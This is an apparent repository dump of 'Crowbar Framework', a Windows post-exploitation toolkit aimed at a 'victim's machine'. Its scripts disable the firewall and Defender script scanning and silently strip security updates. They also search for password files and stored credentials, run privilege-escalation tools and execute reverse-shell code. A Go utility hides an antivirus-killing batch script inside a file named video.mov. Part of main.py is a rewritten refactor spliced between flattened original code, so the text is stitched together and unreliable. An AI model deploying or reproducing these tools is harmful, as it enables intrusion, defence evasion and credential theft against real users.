| 526 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 527 | ''') 528 | elif scriptssnmpkey == "run": 529 | os.system('''reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"''') 530 | elif scriptssnmpkey == "clear": 531 | functionclear() 532 | elif scriptssnmpkey == "back": 533 | leavescripts() 534 | else: 535 | print("Wrong Command!") 536 | elif scripts == "use 15": 537 | while True: 538 | scriptsregrunkey = input("\nScripts (scripts/cmd/read_registry_run_key)\n |==> ") 539 | if scriptsregrunkey == "help": 540 | print(''' 541 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 542 | | help - Prints out help commands. | 543 | | run - Runs the script against the host machine. | 544 | | clear - Clears the screen. | 545 | | back - goes back to the 'Scripts' directory. | 546 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 547 | ''') 548 | elif scriptsregrunkey == "run": 549 | os.system("reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run") 550 | elif scriptsregrunkey == "clear": 551 | functionclear() 552 | elif scriptsregrunkey == "back": 553 | leavescripts() 554 | else: 555 | print("Wrong Command!") 556 | elif scripts == "use 16": 557 | while True: 558 | scriptsnetshares = input("\nScripts (scripts/cmd/list_network_shares)\n |==> ") 559 | if scriptsnetshares == "help": 560 | print(''' 561 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 562 | | help - Prints out help commands. | 563 | | run - Runs the script against the host machine. | 564 | | clear - Clears the screen. | 565 | | back - goes back to the 'Scripts' directory. 
| 566 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 567 | ''') 568 | elif scriptsnetshares == "run": 569 | os.system("net share") 570 | elif scriptsnetshares == "clear": 571 | functionclear() 572 | elif scriptsnetshares == "back": 573 | leavescripts() 574 | else: 575 | print("Wrong Command!") 576 | elif scripts == "use 17": 577 | while True: 578 | scriptslistlocalgroup = input("\nScripts (scripts/cmd/list_localgroups)\n |==> ") 579 | if scriptslistlocalgroup == "help": 580 | print(''' 581 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 582 | | help - Prints out help commands. | 583 | | run - Runs the script against the host machine. | 584 | | clear - Clears the screen. | 585 | | back - goes back to the 'Scripts' directory. | 586 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 587 | ''') 588 | elif scriptslistlocalgroup == "run": 589 | os.system("net localgroup") 590 | elif scriptslistlocalgroup == "clear": 591 | functionclear() 592 | elif scriptslistlocalgroup == "back": 593 | leavescripts() 594 | else: 595 | print("Wrong Command!") 596 | elif scripts == "use 18": 597 | while True: 598 | scriptslistdrive = input("\nScripts (scripts/cmd/list_drives)\n |==> ") 599 | if scriptslistdrive == "help": 600 | print(''' 601 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 602 | | help - Prints out help commands. | 603 | | run - Runs the script against the host machine. | 604 | | clear - Clears the screen. | 605 | | back - goes back to the 'Scripts' directory. 
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+
''')
                elif scriptslistdrive == "run":
                    os.system("wmic logicaldisk get caption,description,providername")
                elif scriptslistdrive == "clear":
                    functionclear()
                elif scriptslistdrive == "back":
                    leavescripts()
                else:
                    print("Wrong Command!")
        # Entries "use 19" .. "use 35" all follow the same help/run/clear/back
        # pattern, so they are table-driven: see SCRIPT_MENUS and submenu() below.
        elif scripts in SCRIPT_MENUS:
            submenu("Scripts", SCRIPT_MENUS[scripts])
        else:
            print("Wrong Command!")


# ---------------------------------------------------------------------------
# Shared menu plumbing
# ---------------------------------------------------------------------------

BOX_WIDTH = 140  # total width of a framed message, corners included


def box(title, rows):
    """Frame rows in the '+——— Title ———+' style used throughout the menus."""
    inner = BOX_WIDTH - 2
    head = "+" + ("——— " + title + " ").ljust(inner, "—") + "+"
    body = ["| " + row.ljust(inner - 1) + "|" for row in rows]
    foot = "+" + "—" * inner + "+"
    return "\n" + "\n".join([head] + body + [foot]) + "\n"


def table_box(title, rows, col=72):
    """Two-column frame used by the 'list' commands: name column, then description."""
    inner = BOX_WIDTH - 2
    head = ("———— " + title + " ").ljust(col - 2, "—") + " Description "
    head = "+" + head.ljust(inner, "—") + "+"
    body = ["| " + (name.ljust(col - 2) + desc).ljust(inner - 1) + "|"
            for name, desc in rows]
    foot = "+" + "—" * inner + "+"
    return "\n" + "\n".join([head] + body + [foot]) + "\n"


def run(command):
    """Run one cmd.exe command line and wait for it to finish
    (os.system / subprocess.call(shell=True) in the original)."""
    subprocess.call(command, shell=True)


def shell(command):
    """Defer run(command) so it can be stored in a menu table."""
    return lambda: run(command)


def ps_script(path):
    """Defer launching a .ps1 file the way the original did: the file's text is
    read with Get-Content and piped into a second PowerShell reading stdin."""
    return shell("powershell.exe Get-Content {} | PowerShell.exe -noprofile -".format(path))


class Entry:
    """One 'use N' entry: the path shown in the prompt plus its commands."""

    def __init__(self, path, actions, help_fn=None):
        self.path = path          # e.g. "scripts/cmd/get_snmp_config"
        self.actions = actions    # command word -> (help text, callable)
        self.help_fn = help_fn    # custom help printer (only iMonitor needs one)


def submenu(menu, entry):
    """Prompt loop shared by every entry: help / <action> / clear / back."""
    while True:
        choice = input("\n{} ({})\n |==> ".format(menu, entry.path))
        if choice == "help":
            if entry.help_fn:
                entry.help_fn()
            else:
                rows = ["help - Prints out help commands."]
                rows += ["{} - {}".format(word, text)
                         for word, (text, _) in entry.actions.items()]
                rows += ["clear - Clears the screen.",
                         "back - Goes back to the '{}' directory.".format(menu)]
                print(box("Help", rows))
        elif choice == "clear":
            functionclear()
        elif choice == "back":
            # Returning lets the caller's loop show the parent prompt again
            # (the original re-entered the parent function recursively instead).
            return
        elif choice in entry.actions:
            entry.actions[choice][1]()
        else:
            print("Wrong Command!")


# ---------------------------------------------------------------------------
# Scripts menu, entries 19 .. 35
# ---------------------------------------------------------------------------

RUN_SCRIPT = "Runs the script against the host machine."


def script_entry(path, action):
    return Entry(path, {"run": (RUN_SCRIPT, action)})


def remove_update():
    ps_script("scripts/removeupdate.ps1")()
    print(box("Message", ["Updates removed!"]))


SCRIPT_MENUS = {
    # raw string: the original's plain "\S", "\C" were invalid escape sequences
    "use 19": script_entry("scripts/cmd/get_snmp_config",
                           shell(r"reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s")),
    "use 20": script_entry("scripts/cmd/list_user_privileges", shell("whoami /priv")),
    "use 21": script_entry("scripts/cmd/read_services", shell("wmic service list brief")),
    "use 22": script_entry("scripts/cmd/list_installed_updates", shell("wmic qfe")),
    "use 23": script_entry("scripts/powershell/list_unquoted_services",
                           ps_script("scripts/unquoteservice.ps1")),
    "use 24": script_entry("scripts/powershell/list_routing_tables",
                           ps_script("scripts/routingtable.ps1")),
    "use 25": script_entry("scripts/powershell/list_network_interfaces",
                           ps_script("scripts/listnetworkinter.ps1")),
    "use 26": script_entry("scripts/powershell/list_installed_programs_using_registry",
                           ps_script("scripts/listprogramsreg.ps1")),
    "use 27": script_entry("scripts/powershell/list_installed_programs_using_folders",
                           ps_script("scripts/listprogramsfol.ps1")),
    "use 28": script_entry("scripts/powershell/list_arp_tables",
                           ps_script("scripts/listarptables.ps1")),
    "use 29": script_entry("scripts/powershell/get_iis_config",
                           ps_script("scripts/iisconfig.ps1")),
    "use 30": script_entry("scripts/powershell/sensitive_data_search",
                           ps_script("scripts/sensitive_data_search.ps1")),
    "use 31": script_entry("scripts/powershell/list_credentials",
                           ps_script("scripts/listcredentials.ps1")),
    "use 32": script_entry("scripts/powershell/remove_update", remove_update),
    "use 33": script_entry("scripts/powershell/get_unconstrained",
                           shell("(cd scripts) && (PowerShell.exe -ExecutionPolicy Bypass -File ./getunconstrained.ps1)")),
    "use 34": script_entry("scripts/extra/cmd/get_architecture",
                           shell("wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%")),
    "use 35": script_entry("scripts/extra/cmd/list_antivirus",
                           shell("cd scripts && list_antivirus.bat")),
}


# ---------------------------------------------------------------------------
# Util menu
# ---------------------------------------------------------------------------

RUN_UTIL = "Runs utility against the target machine."


def util_entry(path, action):
    return Entry(path, {"run": (RUN_UTIL, action)})


def nmap_scan():
    answer = input("\nUtil (Do you want to do a default scan? y or n)\n |==> ")
    if answer in ("Y", "y"):
        run("nmap localhost")
    elif answer in ("N", "n"):
        run(input("\nUtil (Type in custom command)\n |==> "))
    else:
        print("Wrong Command!")
        return
    print(box("Message", ["Scan complete!"]))


def av_trigger():
    run("go run util/Avtrigger/main.go")
    print(box("Message", ["AntiVirus triggered!"]))


def imonitor_help():
    print(table_box("iMonitor Commands", [
        ("tasklist", "Lists active processes."),
        ("forcekill", "Allows you to forcibly kill tasks."),
        ("remotetask", "Allows you to list tasks on a remote computer."),
        ("stasks", "Allows you to query tasks you have access to."),
    ], col=24))
    print(box("Regular Help Commands", [
        "help - Prints out help commands.",
        "clear - Clears the screen.",
        "back - Goes back to the 'Util' directory.",
    ]))


def force_kill():
    pid = input("\nUtil (Enter PID of process you want to kill)\n |==> ")
    run("taskkill /PID {} /F".format(pid))


def remote_tasklist():
    host = input("\nUtil (Enter Name of remote computer)\n |==> ")
    run("tasklist /V /S {}".format(host))


def netcat_listen():
    answer = input("\nUtil (Do you want to start the listener with default settings? y or n)\n |==> ")
    if answer in ("Y", "y"):
        ip = input("\nUtil (Type in IP)\n |==> ")
        port = input("\nUtil (Type in Port)\n |==> ")
        print(box("Message", ["Listener started!"]))
        run("ncat -nv {} {}".format(ip, port))
    elif answer in ("N", "n"):
        run(input("\nUtil (Type in custom command)\n |==> "))
    else:
        print("Wrong Command!")


UTIL_LIST = [
    ("1. util/extra/vmdetect", "A utility for VM Detection."),
    ("2. util/nmap [Nmap must be installed on target machine]", "Runs a port scan against the target."),
    ("3. util/screencapture", "Takes a screenshot of the target's screen."),
    ("4. util/extra/avtrigger [Golang must be installed on target machine]",
     "Triggers target's AntiVirus [if enabled] with a video."),
    ("5. util/imonitor", "A utility for task monitoring."),
    ("6. util/ipv4", "Grabs IPv4 of target machine."),
    ("7. util/netcat [NetCat must be installed on the target machine]", "Starts netcat listener."),
    ("8. util/powershell/check_windows_av", "Checks the status of Windows Defender."),
    ("9. util/powershell/disable_script_scanning", "Disables script scanning on the target machine."),
    ("10. util/powershell/list_firewall_blocked_ports", "Lists the firewall's blocked ports."),
    ("11. util/powershell/disable_firewall [Windows 7 Only]", "Disables the firewall on the target machine."),
    ("12. util/powershell/get_powershell_history", "Gets the PowerShell command history of the target machine."),
]

# ipurl and iptrack are set earlier in main.py (outside this excerpt).
UTIL_MENUS = {
    "use 2": Entry("util/nmap",
                   {"nmap": ("Will allow you to port scan the machine.", nmap_scan)}),
    "use 3": Entry("util/screencapture",
                   {"capture": ("Captures the screen.", shell("py util/screencapture.py"))}),
    "use 4": Entry("util/extra/avtrigger",
                   {"trigger": ("Triggers the AV.", av_trigger)}),
    "use 5": Entry("util/imonitor", {
        "tasklist": ("Lists active processes.", shell("tasklist /svc")),
        "forcekill": ("Allows you to forcibly kill tasks.", force_kill),
        "remotetask": ("Allows you to list tasks on a remote computer.", remote_tasklist),
        "stasks": ("Allows you to query tasks you have access to.", shell("schtasks")),
    }, help_fn=imonitor_help),
    "use 6": Entry("util/ipv4", {
        "ip": ("Gets the target machine's IP address.", lambda: print(ipurl)),
        "track": ("Tracks the target machine's IP address.", lambda: print(iptrack)),
    }),
    "use 7": Entry("util/netcat",
                   {"listen": ("Starts a netcat listener.", netcat_listen)}),
    "use 8": util_entry("util/powershell/check_windows_av",
                        shell("powershell.exe Get-MpComputerStatus")),
    "use 9": util_entry("util/powershell/disable_script_scanning",
                        shell("powershell.exe Set-MpPreference -DisableScriptScanning 1")),
    "use 10": util_entry("util/powershell/list_firewall_blocked_ports",
                         ps_script("util/list_firewall_blocked_ports.ps1")),
    "use 11": util_entry("util/powershell/disable_firewall",
                         shell("cd util && powershell.exe ./disable_firewall.ps1")),
    "use 12": util_entry("util/powershell/get_powershell_history",
                         ps_script("util/get_powershell_history.ps1")),
}


def leaveutil():
    util()


def util():
    while True:
        choice = input("\nUtil (util/)\n |==> ")
        if choice == "help":
            print(box("Help", [
                "help - Prints out help commands.",
                "list - Lists all the utilities.",
                "use (utility number) - Selects and loads specified utility. Example: use 1",
                "clear - Clears the screen.",
                "back - Goes back to the Crowbar menu.",
            ]))
        elif choice == "list":
            print(table_box("Utilities", UTIL_LIST))
        elif choice == "clear":
            functionclear()
        elif choice == "back":
            crowbarbanner()
            mainmenuinput()
        elif choice == "use 1":
            print(box("Message", [
                "Make sure you compile this into an EXE before",
                "executing on the victim's machine! This was made by my friend.",
                "Credits to: https://github.com/dehoisted",
            ]))
        elif choice in UTIL_MENUS:
            submenu("Util", UTIL_MENUS[choice])
        else:
            print("Wrong Command!")


def icommand():
    print(box("Help Commands for iCommand", [
        "clear - Clears the screen.",
        "back - Goes back to the Crowbar menu.",
    ]))
    while True:
        icommandin = input("\niCommand (Type the command you want to execute)\n |==> ")
        if icommandin == "clear":
            functionclear()
        elif icommandin == "back":
            crowbarbanner()
            mainmenuinput()
        else:
            # The original fell through here and also handed "clear"/"back" to the shell.
            run(icommandin)


def ipower():
    print(box("Help Commands for iPower", [
        "clear - Clears the screen.",
        "back - Goes back to the Crowbar menu.",
    ]))
    while True:
        command = input("\niPower (Type the command you want to execute)\n |==> ")
        if command == "clear":
            functionclear()
        elif command == "back":
            crowbarbanner()
            mainmenuinput()
        else:
            run("powershell {}".format(command))


# credits to https://github.com/M4ximuss/ for the 'powerless' script
# credits to https://github.com/carlospolop/ for the 'WinPEAS' script
# credits to https://github.com/joshuaruppe/ for the 'winprivesc' script

SCAN_ESCALATE = "Starts scanning for paths to escalate privileges."


def winpeas_scan():
    run("cd escalate && winPEAS.bat")
    # winPEAS changes the console title; restore the framework's own title.
    ctypes.windll.kernel32.SetConsoleTitleW("[Crowbar Framework]")


def winprivesc_run():
    # The body of this action lies past the end of this excerpt of main.py;
    # its help text describes it as loading the script and its menus.
    raise NotImplementedError("escalate/winprivesc 'run' is not part of this excerpt")


ESCALATE_LIST = [
    ("1. escalate/winpeas", "WinPEAS searches for paths to escalate privileges on Windows."),
    ("2. escalate/powerless", "A Windows privilege escalation script."),
    ("3. escalate/winprivesc", "Script for Windows enumeration and privilege escalation routes."),
]

ESCALATE_MENUS = {
    "use 1": Entry("escalate/winpeas", {"scan": (SCAN_ESCALATE, winpeas_scan)}),
    "use 2": Entry("escalate/powerless",
                   {"scan": (SCAN_ESCALATE, shell("cd escalate && Powerless.bat"))}),
    "use 3": Entry("escalate/winprivesc",
                   {"run": ("Loads the script and the menus.", winprivesc_run)}),
}


def leaveescalate():
    escalate()


def escalate():
    while True:
        choice = input("\nEscalate (escalate/)\n |==> ")
        if choice == "help":
            print(box("Help", [
                "help - Prints out help commands.",
                "list - Lists all the escalation scripts.",
                "use (escalation script number) - Selects and loads specified method. Example: use 1",
                "clear - Clears the screen.",
                "back - Goes back to the Crowbar menu.",
            ]))
        elif choice == "list":
            print(table_box("Escalation Scripts", ESCALATE_LIST))
        elif choice == "clear":
            functionclear()
        elif choice == "back":
            crowbarbanner()
            mainmenuinput()
        elif choice in ESCALATE_MENUS:
            submenu("Escalate", ESCALATE_MENUS[choice])
        else:
            print("Wrong Command!")
| 1407 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1408 | ''') 1409 | elif escalatewinprivesc == "run": 1410 | os.system("cd escalate && winprivesc.bat") 1411 | elif escalatewinprivesc == "clear": 1412 | functionclear() 1413 | elif escalatewinprivesc == "back": 1414 | leaveescalate() 1415 | else: 1416 | print("Wrong Command!") 1417 | else: 1418 | print("Wrong Command!") 1419 | 1420 | 1421 | def wsl(): 1422 | while True: 1423 | wslmenu = input("\nWSL (wsl/)\n |==> ") 1424 | if wslmenu == "help" or wslmenu == "list": 1425 | print(''' 1426 | +— WSL Commands —————————————————————————————————————————————————————————————————— Description ———————————————————————————————————————+ 1427 | | check Checks if WSL is installed on the target machine. | 1428 | | who Checks what user you're on. | 1429 | | shell Allows you to execute reverse and bind shell code. | 1430 | | load Loads WSL. | 1431 | +—————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1432 | 1433 | +——— Regular Help Commands ——————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1434 | | help - Prints out help commands. | 1435 | | clear - Clears the screen. | 1436 | | back - Goes back to the 'Util' directory. 
| 1437 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1438 | ''') 1439 | elif wslmenu == "check": 1440 | os.system("wsl uname -a") 1441 | elif wslmenu == "who": 1442 | os.system("wsl whoami") 1443 | elif wslmenu == "shell": 1444 | wslmenu = input("\nWSL (Enter reverse shell code)\n |==> ") 1445 | os.system("python -c '{}'".format(wslmenu)) 1446 | elif wslmenu == "load": 1447 | print(''' 1448 | +——— Message ————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1449 | | To return to the Crowbar Framework, type 'exit'. | 1450 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1451 | ''') 1452 | os.system("wsl") 1453 | elif wslmenu == "clear": 1454 | os.system("cls") 1455 | elif wslmenu == "back": 1456 | crowbarbanner() 1457 | mainmenuinput() 1458 | else: 1459 | print("Wrong Command!") 1460 | 1461 | 1462 | 1463 | 1464 | def mainmenuinput(): 1465 | while True: 1466 | mainmenu = input("\nuser@crowbar:~# ") 1467 | if mainmenu == "help": 1468 | print(''' 1469 | +——— Help ———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1470 | | help - Prints out help commands. (This is for the entire framework) | 1471 | | dir util - Goes into the 'Util' directory. | 1472 | | dir scripts - Goes into the 'Scripts' directory. | 1473 | | dir escalate - Goes into the 'Escalate' directory. | 1474 | | command - Loads the 'iCommand' tool for executing OS commands via CMD. | 1475 | | power - Loads the 'iPower' tool for executing OS commands via PowerShell. | 1476 | | wsl - Checks if 'Windows Subsystem for Linux' is installed on the target machine. Type 'help' once you enter the 'wsl' menu. | 1477 | | crowbar - Reloads the framework. 
| 1478 | | clear - Clears the screen. (This is for the entire framework) | 1479 | +————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1480 | ''') 1481 | elif mainmenu == "dir util": 1482 | util() 1483 | elif mainmenu == "dir scripts": 1484 | scripts() 1485 | elif mainmenu == "dir escalate": 1486 | escalate() 1487 | elif mainmenu == "command": 1488 | icommand() 1489 | elif mainmenu == "power": 1490 | ipower() 1491 | elif mainmenu == "wsl": 1492 | wsl() 1493 | elif mainmenu == "crowbar": 1494 | os.system("py main.py") 1495 | elif mainmenu == "clear": 1496 | functionclear() 1497 | else: 1498 | print("Wrong Command!") 1499 | 1500 | 1501 | def crowbarbanner(): 1502 | functionclear() 1503 | print(f''' 1504 | ▄█▄ █▄▄▄▄ ████▄ ▄ ▄ ███ ██ █▄▄▄▄ 1505 | █▀ ▀▄ █ ▄▀ █ █ █ █ █ █ █ █ █ ▄▀ 1506 | █ ▀ █▀▀▌ █ █ █ ▄ █ █ ▀ ▄ █▄▄█ █▀▀▌ 1507 | █▄ ▄▀ █ █ ▀████ █ █ █ █ ▄▀ █ █ █ █ 1508 | ▀███▀ █ █ █ █ ███ █ █ 1509 | ▀ ▀ ▀ █ ▀ 1510 | ▀ 1511 | 1512 | Welcome {beginmen} 1513 | to the Crowbar Framework. 
1514 | ''') 1515 | 1516 | print(''' 1517 | +——— Crowbar ——————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1518 | | Version: 3.0 | 1519 | | Scripts: 38 | 1520 | | Utilities: 12 | 1521 | | Made by: https://github.com/0x1CA3 | 1522 | | | 1523 | | Total Online Services: 2 | 1524 | | https://vpnapi.io/api/ | 1525 | | https://ipv4bot.whatismyipaddress.com/ | 1526 | +——————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————+ 1527 | ''') 1528 | 1529 | crowbarbanner() 1530 | mainmenuinput() 1531 | -------------------------------------------------------------------------------- /requirements.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | 3 | pip3 install ctypes 4 | pip3 install datetime 5 | pip3 install shutil 6 | pip3 install pyautogui 7 | pip3 install winreg 8 | pip3 install socket 9 | pip3 install platform 10 | pip3 install psutil 11 | pip3 install requests 12 | pip3 install subprocess 13 | pip3 install get_mac_address 14 | pip3 install getmac 15 | -------------------------------------------------------------------------------- /scripts/getunconstrained.ps1: -------------------------------------------------------------------------------- 1 | function Get-Unconstrained { 2 | <# 3 | .SYNOPSIS 4 | Nishang script which searches computers in current domain which have Unconstrained Delegation Enabled. 5 | 6 | .DESCRIPTION 7 | The script searches in the current domain for computers which have Unconstrained Delegation enabled. 8 | The script needs to be run from an elevated shell. It requires ActiveDirectory module available with RSAT-AD-PowerShell 9 | Windows feature. The feature and module are auto-enabled by the script on a Windows Server 2012 machine. 
10 | The commands used in this post are taken from this post https://adsecurity.org/?p=1667 11 | .PARAMETER Details 12 | Returns more detailed description of the computer with Unconstrained delegation. 13 | .EXAMPLE 14 | PS > Get-Unconstrained 15 | Use above command to search for computers which have unconstrained delegation enabled. Shows name of the computers. 16 | .EXAMPLE 17 | PS > Get-Unconstrained -Details 18 | Use above command to search for computers which have unconstrained delegation enabled. Shows detailed output. 19 | 20 | .LINK 21 | http://www.labofapenetrationtester.com/2016/02/getting-domain-admin-with-kerberos-unconstrained-delegation.html 22 | https://adsecurity.org/?p=1667 23 | https://github.com/samratashok/nishang 24 | #> 25 | 26 | [CmdletBinding()] Param ( 27 | [Parameter(Position = 0, Mandatory=$False)] 28 | [Switch] 29 | $Detailed 30 | ) 31 | 32 | 33 | # Check if User is Elevated 34 | $currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent()) 35 | if($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -ne $true) 36 | { 37 | Write-Warning "Run the Command as an Administrator" 38 | break 39 | } 40 | 41 | #Check for Server 2012 42 | $OSVersion = (Get-WmiObject -Class win32_OperatingSystem).BuildNumber 43 | if($OSVersion -notmatch 96) 44 | { 45 | Write-Warning "This script needs ActiveDirectory module which is available in Server 2012 with RSAT-AD-PowerShell. For other Window versions, you need to install the module manually." 46 | } 47 | else 48 | { 49 | Write-Verbose "Running on Server 2012" 50 | } 51 | 52 | #Check if the Windows feature is already installed 53 | if((Get-WindowsFeature -Name RSAT-AD-PowerShell).InstallState -ne "Installed") 54 | { 55 | Write-Warning "Required module not found. Installing it." 56 | Add-WindowsFeature -Name RSAT-AD-Powershell -Verbose 57 | } 58 | else 59 | { 60 | Write-Verbose "Required module found. Continuing.." 
61 | } 62 | 63 | #Import the required module 64 | Write-Verbose "Importing the ActiveDirectory Module" 65 | Import-Module ActiveDirectory 66 | 67 | #Search for Unconstrained delegation 68 | Write-Output "Searching for domain computers with Unconstrained Delegation" 69 | $computer = Get-ADComputer -Filter {(TrustedForDelegation -eq $True) -and (PrimaryGroupID -eq 515)} 70 | if ($Detailed) 71 | { 72 | Get-ADComputer $computer.Name -Properties * 73 | } 74 | else 75 | { 76 | $computer.DnsHostName 77 | } 78 | } 79 | -------------------------------------------------------------------------------- /scripts/iisconfig.ps1: -------------------------------------------------------------------------------- 1 | Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue -------------------------------------------------------------------------------- /scripts/list_antivirus.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | 3 | WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName -------------------------------------------------------------------------------- /scripts/listarptables.ps1: -------------------------------------------------------------------------------- 1 | Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State -------------------------------------------------------------------------------- /scripts/listcredentials.ps1: -------------------------------------------------------------------------------- 1 | cmdkey /list -------------------------------------------------------------------------------- /scripts/listnetworkinter.ps1: -------------------------------------------------------------------------------- 1 | Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address -------------------------------------------------------------------------------- /scripts/listprogramsfol.ps1: 
-------------------------------------------------------------------------------- 1 | Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime -------------------------------------------------------------------------------- /scripts/listprogramsreg.ps1: -------------------------------------------------------------------------------- 1 | Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name -------------------------------------------------------------------------------- /scripts/removeupdate.ps1: -------------------------------------------------------------------------------- 1 | function Remove-Update { 2 | <# 3 | .SYNOPSIS 4 | Nishang Payload which silently removes updates for a target machine. 5 | .DESCRIPTION 6 | This payload removes updates from a target machine. This could be 7 | used to remove all updates, all security updates or a particular update. 8 | .PARAMETER KBID 9 | THE KBID of update you want to remove. All and Security are also validd. 10 | .EXAMPLE 11 | PS > Remove-Update All 12 | This removes all updates from the target. 13 | .EXAMPLE 14 | PS > Remove-Update Security 15 | This removes all security updates from the target. 16 | .EXAMPLE 17 | PS > Remove-Update KB2761226 18 | This removes KB2761226 from the target. 19 | .LINK 20 | http://trevorsullivan.net/2011/05/31/powershell-removing-software-updates-from-windows/ 21 | https://github.com/samratashok/nishang 22 | #> 23 | [CmdletBinding()] Param( 24 | [Parameter(Position = 0, Mandatory = $True)] 25 | [String] 26 | $KBID 27 | ) 28 | 29 | $HotFixes = Get-HotFix 30 | 31 | foreach ($HotFix in $HotFixes) 32 | { 33 | 34 | if ($KBID -eq $HotFix.HotfixId) 35 | { 36 | 37 | $KBID = $HotFix.HotfixId.Replace("KB", "") 38 | $RemovalCommand = "wusa.exe /uninstall /kb:$KBID /quiet /norestart" 39 | Write-Host "Removing $KBID from the target." 
40 | Invoke-Expression $RemovalCommand 41 | break 42 | } 43 | 44 | if ($KBID -match "All") 45 | { 46 | $KBNumber = $HotFix.HotfixId.Replace("KB", "") 47 | $RemovalCommand = "wusa.exe /uninstall /kb:$KBNumber /quiet /norestart" 48 | Write-Host "Removing update $KBNumber from the target." 49 | Invoke-Expression $RemovalCommand 50 | 51 | } 52 | 53 | if ($KBID -match "Security") 54 | { 55 | if ($HotFix.Description -match "Security") 56 | { 57 | 58 | $KBSecurity = $HotFix.HotfixId.Replace("KB", "") 59 | $RemovalCommand = "wusa.exe /uninstall /kb:$KBSecurity /quiet /norestart" 60 | Write-Host "Removing Security Update $KBSecurity from the target." 61 | Invoke-Expression $RemovalCommand 62 | } 63 | } 64 | 65 | 66 | while (@(Get-Process wusa -ErrorAction SilentlyContinue).Count -ne 0) 67 | { 68 | Start-Sleep 3 69 | Write-Host "Waiting for update removal to finish ..." 70 | } 71 | } 72 | 73 | } 74 | -------------------------------------------------------------------------------- /scripts/routingtable.ps1: -------------------------------------------------------------------------------- 1 | Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex -------------------------------------------------------------------------------- /scripts/sensitive_data_search.ps1: -------------------------------------------------------------------------------- 1 | gci c:\ -Include *pass*.txt,*pass*.xml,*pass*.ini,*pass*.xlsx,*cred*,*vnc*,*.config*,*accounts* -File -Recurse -EA SilentlyContinue -------------------------------------------------------------------------------- /scripts/unquoteservice.ps1: -------------------------------------------------------------------------------- 1 | gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name 
-------------------------------------------------------------------------------- /util/AvTrigger/main.go: -------------------------------------------------------------------------------- 1 | // Made by https://github.com/0x1CA3 // 2 | 3 | package main 4 | 5 | import ( 6 | "fmt" 7 | "os" 8 | ) 9 | 10 | func main() { 11 | message := "@echo off\nrem\nrem Permanently Kill Anti-Virus\nnet stop “Security Center”\nnetsh firewall set opmode mode=disable\ntskill /A av*\ntskill /A fire*\ntskill /A anti*\ncls\ntskill /A spy*\ntskill /A bullguard\ntskill /A PersFw\ntskill /A KAV*\ntskill /A ZONEALARM\ntskill /A SAFEWEB\ncls" 12 | filename := "Util/AvTrigger/video.mov" 13 | 14 | f, err := os.OpenFile(filename, os.O_RDWR|os.O_APPEND|os.O_CREATE, 0660) 15 | 16 | if err != nil { 17 | fmt.Println(err) 18 | os.Exit(-1) 19 | } 20 | defer f.Close() 21 | 22 | fmt.Fprintf(f, "%s\n", message) 23 | fmt.Println("Successfully binded!\nIf it does not work or the file") 24 | fmt.Println("has been deleted, please disable\nyour antivirus and run the program") 25 | fmt.Println("again. 
Once you do it would be\nrecommended to save it in a") 26 | fmt.Println("private discord server or groupchat\nso it does not get deleted just") 27 | fmt.Println("incase your antivirus decides to be a bitch") 28 | } 29 | -------------------------------------------------------------------------------- /util/VM-Detect/example.cpp: -------------------------------------------------------------------------------- 1 | /* Vm Detector */ 2 | /* Made by https://github.com/dehoisted */ 3 | 4 | #include "antivm.h" 5 | 6 | int main() 7 | { 8 | switch (isVM()) 9 | { 10 | case true: 11 | std::cout << "Virtual Machine detected\n"; 12 | exit(0); 13 | break; 14 | 15 | case false: 16 | std::cout << "Virtual Machine not detected\n"; 17 | break; 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /util/VM-Detect/vmdetect.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | 6 | void toLowerCase(char* ptr, unsigned int len) { 7 | for (unsigned int i = 0; i < len; i++) { 8 | if (isupper(ptr[i])) 9 | ptr[i] = tolower(ptr[i]); 10 | } 11 | } 12 | 13 | // Easy to improve yourself 14 | bool isVM() 15 | { 16 | std::string sysManufacturer, sysName; 17 | char buf[1000]; 18 